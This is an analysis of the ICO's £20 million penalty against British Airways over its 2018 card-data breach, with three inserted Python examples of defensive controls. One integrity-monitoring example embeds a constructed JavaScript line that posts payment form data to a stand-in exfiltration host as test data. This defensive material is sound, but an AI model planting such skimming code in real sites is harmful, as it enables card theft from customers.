An analysis of the Monetary Penalty Notice issued by the Information Commissioner's Office to British Airways plc dated 16 October 2020
On 16 October 2020, the ICO issued BA with an MPN, fining the airline £20 million for breaches of Articles 5(1)(f) and 32 of the GDPR in relation to a data breach in 2018.
Introduction
On 16 October 2020, the Information Commissioner's Office (the "ICO") issued British Airways plc ("BA") with a Monetary Penalty Notice[1] (the "MPN"), fining the airline £20 million for breaches of Articles 5(1)(f) and 32[2] of the General Data Protection Regulation[3] (the "GDPR") in relation to a data breach in 2018 in which the personal data of around 430,000 of BA's customers was compromised by a hacker gaining access via systems used to permit staff/contractors to work remotely.
Whilst this is the largest fine imposed by the ICO to date, it is noteworthy that it only represents 11% of the £183.39 million fine proposed in the ICO’s Notice of Intent (“NOI”) dated 8 July 2019.
Aside from the headline-grabbing fine (and the extensive discussion regarding how it was reached), the MPN represents a helpful guide for organisations regarding how to ensure that they have "appropriate technical and organisational measures" in place to avoid regulatory sanctions where personal data is lost arising from unauthorised access to their IT systems.
Background
The data breach
The facts of the data breach, which occurred between 22 June and 5 September 2018, are, in overview:
- An attacker gained unauthorised access to BA’s IT systems through a Citrix remote access gateway (the "CAG") using the login details of an employee of Swissport, one of BA's contractors;
- Having gained access via the CAG, the attacker was able to access BA's wider IT infrastructure using methods which, as at the date of the MPN, had not been ascertained, and accessed a privileged domain administrator account;
- Thereafter, over a number of months, the attacker proceeded to exfiltrate various personal data, namely: (A) the cardholder data[4] of approximately 430,000 BA customers by: (1) editing a JavaScript file on BA's website to send customer payment card data to a separate website controlled by the attacker, "BAways.com"; and (2) accessing unencrypted log files; and (B) usernames and passwords/PIN numbers of a more limited number of customers, employees and contractors; and
- On 5 September 2018, a third party informed BA that data was being exfiltrated from its website, and within a matter of hours, BA took the necessary steps to end the breach.
BA notified the ICO, affected data subjects, and acquirer banks and payment schemes, regarding the data breach the following day.
The ICO's regulatory response
Thereafter, the ICO commenced its investigation, issuing the NOI the following summer which threatened BA with a fine of £183.39 million on the basis that: "a variety of information was compromised by poor security arrangements at [BA]".
In response to the NOI, BA provided three[5] sets of substantive written representations[6] (on 5 September 2019, 31 January 2020, and 12 May 2020):
- Challenging the ICO's finding that BA had failed to put in place "appropriate technical and organisational measures" to prevent, and thereafter, detect, the breach; and
- In the latter case, informing the ICO of the impact that Covid-19 had had on BA’s financial position.
The basis on which the fine was calculated
No doubt, the question on the lips of even the most casual observer of this case is why the final penalty is almost 90% less than that proposed in the NOI a year ago.
A clear answer is not forthcoming in the MPN; it glosses over the issue and instead starts from scratch with the five-step approach outlined in the ICO's Regulatory Action Policy ("RAP")[7].
The key factors on which the Commissioner relied in deciding the quantum of the fine in line with the RAP included:
- The fact that BA "did not gain any financial benefit, or avoid any losses, directly or indirectly as a result of the breach";
- The "serious" nature of BA's failings[8] in "processing a significant amount of personal data in an insecure manner"[9];
- The substantial duration of the breach (103 days)[10];
- The negligent (but not intentional) nature of BA's breaches of GDPR[11];
- The fact that BA were "wholly responsible" for the breaches[12];
- The absence of previous infringements on BA’s part;
- The full cooperation which BA gave to the ICO;
- The fact that, although no special category data was affected, financial data was compromised in the breach[13]; and
- BA's prompt notification of the breach to the ICO.
These factors contributed to the calculation of an initial fine of £30 million, which was then reduced by 6% to £24 million as a result of the following mitigating factors[14]:
- The immediate steps taken by BA to mitigate and minimise damage suffered by affected data subjects (for example, by offering to reimburse all financial losses which they had suffered and offering a free credit monitoring service);
- The prompt notification given to affected data subjects and the ICO;
- Widespread media reporting, which is likely to have increased awareness amongst other data controllers of the risks posed by cyber-attacks; and
- The adverse effect of the breach on BA's brand and reputation[15].
A further reduction of £4 million was made to reflect the impact of Covid-19 on BA's business[16]. The final total was therefore £20 million[17].
As noted above, the MPN does not spell out in clear terms the reasons for the significant reduction in the quantum of BA's fine from that envisaged in the NOI. However, the references to BA’s representations as summarised in the MPN and the Commissioner’s responses provide a number of clues.
It appears that, in reaching the £183.39 million figure in the NOI, the Commissioner had used an unpublished internal document entitled “Draft Internal Procedure for Setting and Issuing Monetary Penalties” (“DAP”), which used turnover as the central metric for calculating fines. The Commissioner backtracked prior to issuing a draft decision to BA, agreeing that “the DAP should not be used in the present case” and noting that “in deciding the appropriate penalty no reference has been made to the DAP”. Instead, “the Commissioner…relied on Article 83 GDPR, section 155 DPA and the RAP”.
A number of other comments made in the MPN are worth noting in respect of penalty calculations more generally:
- Contrary to BA's submission that a turnover-based approach is a "fundamentally flawed" way of achieving proportionate and effective penalties, the MPN emphasises that turnover remains "a relevant metric for assessing whether any fine is proportionate and dissuasive"; it is "one key factor to be taken into account in the round, by reference to the particular facts at issue in the case"[18];
- The Commissioner rejected BA's submission that there is a clear conflict between the maximum fines for breaches of Articles 5(1)(f) and 32 (on the basis that they impose the same obligations but attract different maximum fines). The two provisions are "evidently distinct provisions of the GDPR, notwithstanding the degree of overlap… there is no conflict"[19]; and
- The Commissioner resisted BA's submission that the penalty regime lacks legal certainty and that the Commissioner: "should continue to apply penalties in a manner which is consistent with the approach adopted under the superseded DPA 1998 regime, or with the limited decisions or guidance issued to date by the other supervisory authorities under the GDPR"[20]. The Commissioner also pushed back on assertions that its investigation, the NOI, and the MPN were procedurally deficient in a number of ways[21].
Appropriate technical/organisational measures
The extensive focus in the MPN on the calculation of the fine should not distract readers from carefully reviewing the useful guidance provided in the MPN in relation to the Commissioner's views on "appropriate technical and organisational measures". Taken together with other recent Monetary Penalty Notices (including those issued to Cathay Pacific Airways Limited, The Carphone Warehouse Limited, DSG Retail Limited and Equifax Limited), there is now a substantial body of practical guidance for organisations to rely upon when assessing the appropriateness of the "technical and organisational measures" they have in place.
In summary, the Commissioner concluded that: "between 25 May 2018, when the GDPR entered into force, and (at least) 5 September 2018, when BA took action to prevent the transfer of personal data to BAways.com… BA failed to process personal data in a manner that ensured appropriate security of the personal data, including protection against unauthorised or unlawful processing and against accidental loss, destruction or damage, using appropriate technical and organisational measures as required by Article 5(1)(f) and Article 32 GDPR" and that: "each step of the [a]ttack could have been prevented, or its impact mitigated, by BA implementing one or more of a range of appropriate measures that were open to it".
In the context of the MPN, the following points are of particular note:
- Initial access to the BA systems[22]: the Commissioner determined that BA should have considered the following measures in order to minimise the risk of the attacker gaining initial access to its systems: multi-factor authentication[23]; external public IP address whitelisting; and IPSec VPN.
- Supply chain management[24]: the Commissioner placed particular emphasis on BA's failure to mitigate the risks of a "supply chain attack" attendant in permitting contractors to access its IT infrastructure. The ICO also rejected BA's attempt to rely on a Third-Party System Access Agreement with Swissport which contained certain requirements on password protection to demonstrate that it had implemented appropriate "technical and organisational measures", noting that it does not consider "reliance on such agreements alone to be an effective measure in ensuring that Swissport user credentials, and the access they provided to BA's systems, were appropriately secured."
- Remote access[25]: the Commissioner determined that BA had not appropriately mitigated the risks associated with remote access, which was the threat vector used by the attacker to reach BA's wider IT infrastructure. Appropriate measures in this regard may have included: application whitelisting[26]; application blacklisting; and application/server hardening[27]. Given that many readers' organisations will now be working remotely, these measures should be carefully considered. The importance of penetration testing was also stressed; had it been carried out, "many of the problems identified within [the] decision are likely to have been detected and appropriately addressed" and "security testing of the CAG and associated applications may have identified the ability to break out of the Citrix environment"[28].
- Privileged account management[29]: a key vulnerability identified by the Commissioner was the ease with which the attacker could obtain privileged account details (for example, the credentials of the domain administrator account). This was largely because those credentials were saved in an unencrypted plain text file (referred to as "hardcoding"). In line with previous Monetary Penalty Notices[30], the Commissioner expressed serious concern about the storage of credentials in plain text, emphasising that this was neither standard practice nor an acceptable way of "aiding functionality", as BA had tried to argue. The Commissioner found that, in any event, these risks may have been mitigated by monitoring access to the script in which the passwords were stored in plain text; requiring the input of credentials on execution of the script; and encrypting the script itself when not in use. The Commissioner also treated as a matter of serious concern BA's failure to monitor attempts to access administrator accounts (the attacker had, in fact, failed to access an administrator account on a number of occasions before ultimately gaining access), the use of guest accounts and the creation of additional administrator accounts, and, more generally, BA's failure to securely manage all privileged accounts across its IT infrastructure (e.g. through monitoring and auditing their usage).
- Failure to appropriately manage its website[31]: the Commissioner identified that, despite the fact that its website represented a significant threat vector, BA had failed to review the website's code, to put in place file integrity monitoring to detect changes to that code, or to put in place manual change management controls.
- Failure to adequately protect payment card data[32]: the Commissioner identified that BA's approach to logging such data was particularly deficient, arising (remarkably, given the sensitivity of such data) from inadvertence on BA's part: "logging and storing of these card details (including, in most cases, CVV numbers) was not an intended design feature of BA's systems and was not required for any particular business purpose. It was a testing feature that was only intended to operate when the systems were not live, but which was left activated when the systems went live." This approach was in breach of both the Payment Card Industry Data Security Standard and GDPR.
- Breach detection[33]: the Commissioner emphasised the importance of logging in the breach detection process (for example, the use of a Security Information and Event Management (SIEM) system)[34]. As noted above, the breach only came to BA's attention by virtue of a third party's intervention.
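The "file integrity monitoring to detect changes to that code" which the Commissioner found wanting in the website finding above is a small control to build. The following is an added example, not code from the MPN, from BA or from the ICO: it keeps a SHA-256 baseline of the site's served scripts and, separately, an allow-list of the external hosts those scripts may reference, so that an edited payment script is reported both as a changed file and as one that now talks to a host the site does not own. All file paths, contents and host names are constructed for the example.

```python
"""File integrity monitoring for a website's served code (added example)."""
import hashlib
import re
from typing import Dict, List, Set, Tuple

# Constructed snapshot of the site's assets when the baseline was taken.
BASELINE_FILES: Dict[str, bytes] = {
    "js/payment.js": (
        b"function submitCard(form) {\n"
        b"  return fetch('https://payments.example-airline.test/pay',\n"
        b"               {method: 'POST', body: new FormData(form)});\n"
        b"}\n"
    ),
    "js/app.js": b"console.log('app loaded');\n",
}

# The same assets after an unauthorised edit of payment.js (constructed):
# the script now also posts the form to a host the site does not own.
TAMPERED_FILES: Dict[str, bytes] = dict(BASELINE_FILES)
TAMPERED_FILES["js/payment.js"] = BASELINE_FILES["js/payment.js"] + (
    b"fetch('https://exfil.example.test/c', "
    b"{method: 'POST', body: new FormData(document.forms[0])});\n"
)

# Hosts the site's own scripts are expected to contact (constructed).
ALLOWED_HOSTS: Set[str] = {"payments.example-airline.test",
                           "www.example-airline.test"}

HOST_RE = re.compile(rb"https?://([A-Za-z0-9.-]+)")


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_baseline(files: Dict[str, bytes]) -> Dict[str, str]:
    """One SHA-256 digest per file. Store the result where the web tier
    cannot write to it; otherwise whoever can edit the site can also
    re-baseline their own change."""
    return {path: sha256_hex(data) for path, data in files.items()}


def referenced_hosts(script: bytes) -> Set[str]:
    """Host names appearing in absolute URLs inside a script."""
    return {m.decode() for m in HOST_RE.findall(script)}


def check_integrity(baseline: Dict[str, str],
                    current: Dict[str, bytes]) -> List[Tuple[str, str]]:
    """Compare the live assets against the baseline.

    Returns (path, reason) findings for modified, deleted and added files,
    and for any script that references a host outside ALLOWED_HOSTS. The
    host check still fires if the hash baseline itself has been tampered
    with, which is why the two checks are kept independent."""
    findings: List[Tuple[str, str]] = []
    for path, digest in baseline.items():
        if path not in current:
            findings.append((path, "deleted"))
        elif sha256_hex(current[path]) != digest:
            findings.append((path, "modified"))
    for path in current:
        if path not in baseline:
            findings.append((path, "added"))
    for path, data in current.items():
        if path.endswith(".js"):
            for host in sorted(referenced_hosts(data) - ALLOWED_HOSTS):
                findings.append((path, f"references unapproved host {host}"))
    return findings


def demo() -> List[Tuple[str, str]]:
    """Run the check over the tampered snapshot against the clean baseline."""
    return check_integrity(build_baseline(BASELINE_FILES), TAMPERED_FILES)


if __name__ == "__main__":
    for path, reason in demo():
        print(f"ALERT {path}: {reason}")
```

In a deployment the baseline would be produced by the change management process (the "manual change management controls" the Commissioner also mentions) and the check run on a schedule against the files the web servers actually serve, with any finding routed to the same alerting channel as the logs discussed under breach detection.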
It is important to note that in making these findings, the Commissioner accepted that: "[n]ot every instance of unauthorised processing or breach of security will amount to a breach of Article 5 or Article 32" and that: "comprehensive monitoring of an IT estate as large as BA's may be a relatively complex task".
However, despite BA's protestations to the contrary, including that the attack was highly sophisticated, the Commissioner considered that: "[t]he [a]ttack in this case was not of such a degree of sophistication as to negate BA's responsibilities for securing its system and the personal data processed within it. Many of the steps taken by the [a]ttacker were of a kind that could have been anticipated and addressed, as they were well-known means of attempting to exploit a system" and "BA failed to put in place these measures, which could have prevented, or at least alerted BA, to this [a]ttack". The Commissioner also found unpersuasive BA's contention that, had certain of the deficiencies identified by the Commissioner been remedied, the attacker might nevertheless have adapted their strategy.
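Returning to the payment card finding above: the card details, including CVV numbers, reached BA's logs through a testing feature that was left on in production. The following added example (not code from the MPN or from BA's systems) shows the shape of a control that limits that failure mode regardless of which code path writes the log: a redaction step that drops sensitive authentication data and masks the PAN before a structured record is persisted, and a logging filter that masks card numbers in free-text messages. The field names, the Luhn-based PAN detection and the sample record are this example's own assumptions.

```python
"""Keeping payment card data out of application logs (added example)."""
import json
import logging
import re
from typing import Any, Dict

# Sensitive authentication data that PCI DSS does not permit to be stored
# after authorisation; these fields are removed rather than masked.
DROP_FIELDS = {"cvv", "cvc", "cvv2", "pin", "track_data"}

# 13-19 digit runs are candidate PANs. The Luhn checksum is verified before
# masking so that ordinary numeric identifiers are left untouched.
PAN_RE = re.compile(r"\b\d{13,19}\b")


def luhn_valid(digits: str) -> bool:
    """Luhn checksum used by payment card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def mask_pan(text: str) -> str:
    """Replace each Luhn-valid card number with its first six and last four
    digits, the most PCI DSS allows to be displayed."""
    def _mask(m):
        digits = m.group(0)
        if not luhn_valid(digits):
            return digits
        return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]
    return PAN_RE.sub(_mask, text)


def redact(record: Dict[str, Any]) -> Dict[str, Any]:
    """Return a copy of a structured log record that is safe to persist:
    sensitive authentication data dropped, PANs masked, nested dicts
    handled recursively."""
    out: Dict[str, Any] = {}
    for key, value in record.items():
        if key.lower() in DROP_FIELDS:
            continue
        if isinstance(value, dict):
            out[key] = redact(value)
        elif isinstance(value, str):
            out[key] = mask_pan(value)
        else:
            out[key] = value
    return out


def to_log_line(record: Dict[str, Any]) -> str:
    """Serialise a record for a log sink, redacting first."""
    return json.dumps(redact(record), sort_keys=True)


class CardDataFilter(logging.Filter):
    """Masks card numbers in free-text messages before any handler sees them."""
    def filter(self, record: logging.LogRecord) -> bool:
        record.msg = mask_pan(record.getMessage())
        record.args = ()
        return True


# Constructed example of the kind of record a test-only debug feature wrote.
SAMPLE_RECORD: Dict[str, Any] = {
    "event": "payment.debug",
    "name": "A Customer",
    "card_number": "4111111111111111",
    "expiry": "12/25",
    "cvv": "123",
    "note": "retry for card 4111111111111111",
}


if __name__ == "__main__":
    print(to_log_line(SAMPLE_RECORD))
    logging.basicConfig(level=logging.DEBUG)
    log = logging.getLogger("payments")
    log.addFilter(CardDataFilter())
    log.debug("authorising card %s", SAMPLE_RECORD["card_number"])
```

Masking at the logging layer is a backstop, not a substitute for removing the debug feature: the underlying point in the MPN is that the feature should not have survived go-live at all. The filter exists so that a forgotten debug line cannot put a full card number on disk, which is exactly the failure the Commissioner described.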
Next steps
If BA wishes to appeal the MPN to the First Tier Tribunal, it must serve a notice of appeal by no later than 16 November 2020.
Comment
A portent of future regulatory sanctions?
Caution should be exercised before assuming that the reduced penalty imposed on BA, which, of course, remains substantial in absolute terms, can be taken as an indicator of either: (A) the level at which future fines might be set by the Commissioner; or (B) the approach that the Commissioner will adopt in calculating fines in future cases[35].
In October 2020, the ICO launched a public consultation on its draft statutory guidance on its regulation policy (the "Guidance")[36]. The Guidance, the publication of which appears at least in part to be motivated by the issuance of the MPN, sets out a different approach to calculating fines from that which was taken in the instant case; instead of the five steps (in line with the RAP), the draft sets out a nine-step approach, with fines, in the first instance, being calculated in accordance with turnover as follows:
Had the Guidance been applied in relation to BA, the starting point for the penalty would have been significantly higher than £30 million, and would, in fact, have been in line with the fine of £183.39 million proposed in the NOI[37]. Accordingly, if the Guidance is finalised in its current form, the spectre of fines running to hundreds of millions of pounds still looms large.
Regardless of whether the Guidance is ultimately adopted, the reduced fine which BA achieved highlights the benefits of organisations faced with a serious data breach of:
- Promptly reporting the breach to the ICO and affected data subjects;
- Fully engaging with the ICO throughout any investigation and, as appropriate, following a Notice of Intent being issued;
- Promptly addressing deficiencies in "technical and organisational measures" which have become apparent by virtue of the data breach[38]; and
- Robustly challenging the findings in any Notice of Intent ultimately issued. Had BA adopted a more passive approach, it may have been left facing a fine running into the hundreds of millions.
Civil claims against BA
Despite the findings in the MPN, BA's position remains, of course, that it was not in breach of its obligations under Articles 5(1)(f) and 32 GDPR. However, given that the MPN sets out in great detail why BA's position in this regard is untenable, BA will face an uphill struggle in contesting liability in the various sets of civil proceedings arising out of the data breach which are presently afoot against it, notwithstanding that the Commissioner's decision does not bind BA in those proceedings.
In the instant case, if BA elects not to appeal and assuming that all affected customers pursue claims against BA, its liability from those proceedings could well be more than double that deriving from the MPN.
This is likely to be reflective of a wider trend, with the losses from civil claims arising out of data breaches potentially eclipsing those deriving from regulatory sanctions, even where those sanctions are calculated by reference to the Guidance if it is finalised in its current form[39].
1 As the data breach occurred in June 2018, before the UK left the EU, the ICO investigated on behalf of all EU authorities as lead supervisory authority under the GDPR. Accordingly, the MPN was approved by the other relevant Supervisory Authorities pursuant to Article 60 GDPR.
2 The fact that claims were pursued for breaches of both provisions is important. A breach of Article 32 only engages a fine of "up to €10 million or, in the case of an undertaking, up to 2% of its total worldwide annual turnover of the preceding financial year, whichever is higher", whereas a breach of Article 5 engages a fine of "up to €20 million or, in the case of an undertaking, up to 4% of its total worldwide annual turnover of the preceding financial year, whichever is higher".
4 Namely, the customers' names, addresses, card numbers, CVV numbers and card expiry dates.
5 At law BA was limited to making a single set of representations. However, the Commissioner agreed to permit further representations to be made: "having regard, in particular, to: (i) the complexity of the case, (ii) BA's representations, and (iii) the fact that this is one of the first major decisions made under the new EU data protection regime".
6 It also provided various responses to queries raised by the ICO regarding facts and matters emerging from BA's written representations.
7 Namely:
- Step 1. An ‘initial element’ removing any financial gain from the breach.
- Step 2. Adding in an element to censure the breach based on its scale and severity, taking into account the considerations identified at section 155(2)-(4) of the DPA.
- Step 3. Adding in an element to reflect any aggravating factors.
- Step 4. Adding in an amount for deterrent effect to others.
- Step 5. Reducing the amount (save that in the initial element) to reflect any mitigating factors, including ability to pay (financial hardship).
8 See paragraphs 7.9 – 7.16 of the MPN.
9 It is noteworthy that in assessing this issue, the Commissioner rejected BA's rather hopeful submissions that:
- "the payment card details are the only data which could arguably have any degree of sensitivity. Attackers may exploit combinations of names, usernames and passwords to exploit data subjects";
- It is "inherently unlikely” that consumers will be distressed by learning their payment card data or other personal information has been compromised;
- "payment card breaches, at least of the type involved here, are 'an entirely commonplace phenomenon' and therefore an 'unavoidable fact of life'".
The Commissioner also emphasised that contrary to BA's submission that only customers whose CVV numbers had been compromised would have suffered financial loss: "By way of example, some retailers (such as Amazon) accept card payment without CVV numbers. In any event, individuals are likely to have been distressed by the fact that their personal data had been used unlawfully."
10 The Commissioner accepted BA's submission that the breach should be assessed as at the date the attack ended, rather than the date on which it had remedied the issues giving rise to the breach (16 November 2018). With regard to the start date, the Commissioner noted: "this penalty decision only takes into account failures under the GDPR during the period between 25 May 2018 and 5 September 2018, it is clear that the deficiencies in BA's systems were present for some time" (it could, in principle, have separately fined BA for breaches of the Data Protection Act 1998 in relation to events prior to the GDPR coming into force).
11 See paragraphs 7.17 – 7.23 of the MPN. The Commissioner emphasised in this regard that it had placed: "some weight on the relevant context: a company of the size and profile of BA is expected to be aware that it is likely to be targeted by attackers, sophisticated or otherwise" and the fact that: "BA put in place a programme to prepare its systems for the introduction of the GDPR. However, that programme failed to identify and address the deficiencies in BA's security that were highlighted by the [a]ttack".
12 See paragraphs 7.26 – 7.29 of the MPN.
13 See paragraphs 7.32 – 7.34 of the MPN.
14 See paragraphs 7.35 – 7.53 of the MPN.
15 It is noteworthy in this regard that the Commissioner rejected BA's submission that it: "should take into account in determining whether a fine should be increased to secure a deterrent effect that a controller may have suffered reputational damage / exposure to civil claims as a result of its infringement of the GDPR. Moreover, the Commissioner does not accept that as a matter of general principle concerns about deterrent effect should be limited to deliberate breaches. It is also important to deter data controllers from acting negligently" and that it was not: "appropriate to reduce the penalty by reference to the costs to BA of taking measures to rectify or mitigate the impact of its infringement, including the cost to BA of appointing external forensic consultants or legal advisers".
16 The Commissioner noting: "[a]lthough the Covid-19 pandemic has had a significant short to medium term impact on BA's revenues and its immediate financial position, the Commissioner considers that the overall financial position of BA and its parent company IAG is such that the imposition of a penalty in the range being considered will not cause financial hardship."
17 This total may not have come as a surprise to those eagle-eyed observers who noticed that the IAG Group’s Interim Management Statement for the six months up to 30 June 2020 made provision for an “exceptional expense of EUR22 million… in relation to the theft of customer data at British Airways in 2018”.
18 See paragraphs 7.67 – 7.76 of the MPN.
19 See paragraphs 7.77 – 7.83 of the MPN.
20 See paragraphs 7.95 – 7.123 of the MPN.
21 See paragraphs 7.124 – 7.154 of the MPN.
22 See paragraphs 6.10 – 6.29 of the MPN.
23 See also page 11 of the Monetary Penalty Notice in respect of Cathay Pacific Airways Limited. Remarkably, in this case multi-factor authentication had not been implemented despite the fact that: "BA's own Network Access Control Policy of 7 October 2017 states: 'Multi-factor authentication shall be incorporated for all remote network access (both user and administrator, and including third-party access for support or maintenance) originating from outside the network'".
24 See paragraphs 6.10-6.29 of the MPN.
25 See paragraphs 6.30-6.56 of the MPN.
26 See also page 11 of the Monetary Penalty Notice in respect of DSG Retail Limited.
27 See also page 11 of the Cathay Pacific Monetary Penalty Notice.
28 See also: page 9 of the Monetary Penalty Notice in respect of The Carphone Warehouse Limited; page 11 of the DSG Retail Monetary Penalty Notice; and page 14 of the Cathay Pacific Monetary Penalty Notice.
29 See paragraphs 6.57-6.80 of the MPN.
30 See also page 13 of the Cathay Pacific Monetary Penalty Notice. Here, the Commissioner noted that no day-to-day user accounts should be in the domain administrator group save for the built-in administrator account for the domain; that each account should only be given the tools it needs to perform its own administrative tasks; and that permissions should be afforded for a limited period, not on a permanent basis.
31 See paragraphs 6.84 – 6.88 of the MPN.
32 See paragraph 3.22 of the MPN.
33 See paragraphs 6.81 – 6.84 of the MPN.
34 See also page 9 of the Carphone Warehouse Monetary Penalty Notice, where the Commissioner stated that: log files should be activated for each system processing personal data; logs should cover the actions of both system operators and administrators and should be timestamped and protected against unauthorised modification and deletion; and a monitoring system should be in place to process log files and generate reports on the status of the system and provide alerts in the event of an internal or external system violation.
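The monitoring described in this footnote, and in the privileged account management and breach detection findings in the body of the article (failed attempts against administrator accounts, use of guest accounts, creation of additional administrator accounts), can be expressed as a handful of rules over timestamped logs. The following is an added example, not code from the MPN, from BA's environment or from any of the cited notices: it parses a constructed, timestamped authentication log, counts failures against a set of privileged accounts inside a sliding window, alerts when a success follows those failures, and alerts on guest logons and on additions to the domain administrators group. The log format, account names, threshold and window are this example's assumptions; a SIEM would carry the same logic as correlation rules.

```python
"""Alerting on privileged-account activity from timestamped logs (added example)."""
import re
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Deque, Dict, List, Optional

# Constructed line format: ISO timestamp, host, event, user, optional src/group.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z) host=(?P<host>\S+) "
    r"event=(?P<event>\S+) user=(?P<user>\S+)"
    r"(?: src=(?P<src>\S+))?(?: group=(?P<group>\S+))?$"
)

PRIVILEGED = {"administrator", "svc_backup"}   # constructed account list
FAILURE_THRESHOLD = 3                           # failures per WINDOW
WINDOW = timedelta(minutes=10)

# Constructed sample: three failures against the domain administrator account
# from one source, then a success, then a new member of Domain Admins.
SAMPLE_LOG = """\
2018-06-22T03:14:07Z host=dc01 event=logon_failure user=Administrator src=10.20.30.40
2018-06-22T03:14:39Z host=dc01 event=logon_failure user=Administrator src=10.20.30.40
2018-06-22T03:15:02Z host=dc01 event=logon_success user=jsmith src=10.20.30.41
2018-06-22T03:16:55Z host=dc01 event=logon_failure user=Administrator src=10.20.30.40
2018-06-22T03:18:10Z host=dc01 event=logon_success user=Administrator src=10.20.30.40
2018-06-22T04:02:00Z host=dc01 event=group_member_added user=svc_tmp group=Domain_Admins
"""


@dataclass
class Event:
    ts: datetime
    host: str
    event: str
    user: str
    src: str
    group: str


def parse(line: str) -> Optional[Event]:
    """Parse one log line; returns None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return Event(ts=datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ"),
                 host=m.group("host"), event=m.group("event"),
                 user=m.group("user"), src=m.group("src") or "",
                 group=m.group("group") or "")


def detect(lines: List[str]) -> List[str]:
    """Apply the privileged-account rules in order; returns alert strings."""
    alerts: List[str] = []
    failures: Dict[str, Deque[datetime]] = defaultdict(deque)
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue  # a production pipeline should also count unparseable lines
        user = ev.user.lower()
        stamp = ev.ts.strftime("%Y-%m-%dT%H:%M:%SZ")
        if ev.event == "logon_failure" and user in PRIVILEGED:
            recent = failures[user]
            recent.append(ev.ts)
            while recent and ev.ts - recent[0] > WINDOW:
                recent.popleft()              # drop failures outside the window
            if len(recent) == FAILURE_THRESHOLD:   # alert once per burst
                alerts.append(f"{stamp} {FAILURE_THRESHOLD} failed logons to "
                              f"privileged account {ev.user} from {ev.src} "
                              f"within {WINDOW}")
        elif ev.event == "logon_success" and user in PRIVILEGED:
            in_window = [t for t in failures[user] if ev.ts - t <= WINDOW]
            if in_window:
                alerts.append(f"{stamp} privileged account {ev.user} logged on "
                              f"from {ev.src} after {len(in_window)} recent failures")
            failures[user].clear()
        elif ev.event == "logon_success" and user == "guest":
            alerts.append(f"{stamp} guest account logon on {ev.host} from {ev.src}")
        elif ev.event == "group_member_added" and ev.group.lower() == "domain_admins":
            alerts.append(f"{stamp} {ev.user} added to Domain Admins on {ev.host}")
    return alerts


def demo() -> List[str]:
    return detect(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for alert in demo():
        print("ALERT", alert)
```

The rules are deliberately account-centric rather than source-centric: the Commissioner's concern was that attempts against administrator accounts went unnoticed at all, and a rule keyed on the target account fires whichever address the attempts come from. The footnote's other requirements, timestamps on every line and protection of the log store against modification and deletion, are preconditions for this logic to be trustworthy rather than something it can supply itself.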
35 Readers should note that this is likely also to be the case in relation to the Monetary Penalty Notice which will ultimately be issued to Marriott International, Inc. ("Marriott"), which we anticipate will be similarly reduced from the £99 million fine threatened in the Notice of Intent issued by the ICO, given that that fine is also likely to have been calculated by reference to the DAP (particularly as Marriott will now have had an opportunity to crib from BA's submissions, in particular in relation to the DAP).
37 See page 23 of the draft consultation. This calculation is based on the following assumptions: that the seriousness of the infringement is classified as “high”; that the breach was a product of negligence; that the higher maximum amount would be 4%. In the instant case the Commissioner described BA's infringements as: "a serious failure to comply with the GDPR".
38 In BA's case, the Commissioner notes: "BA implemented additional technical measures, including a next-generation anti-virus and endpoint detection and response tool, called 'Crowdstrike Falcon'".
39 By way of a more extreme example, Marriott is currently facing a claim brought as a representative action on behalf of 339 million affected data subjects, which could (at least in theory) leave it facing liability running to hundreds of billions of pounds (i.e. a thousand times the fine threatened in the Notice of Intent referred to above and more than five times its annual revenue ($20.97bn in 2019)).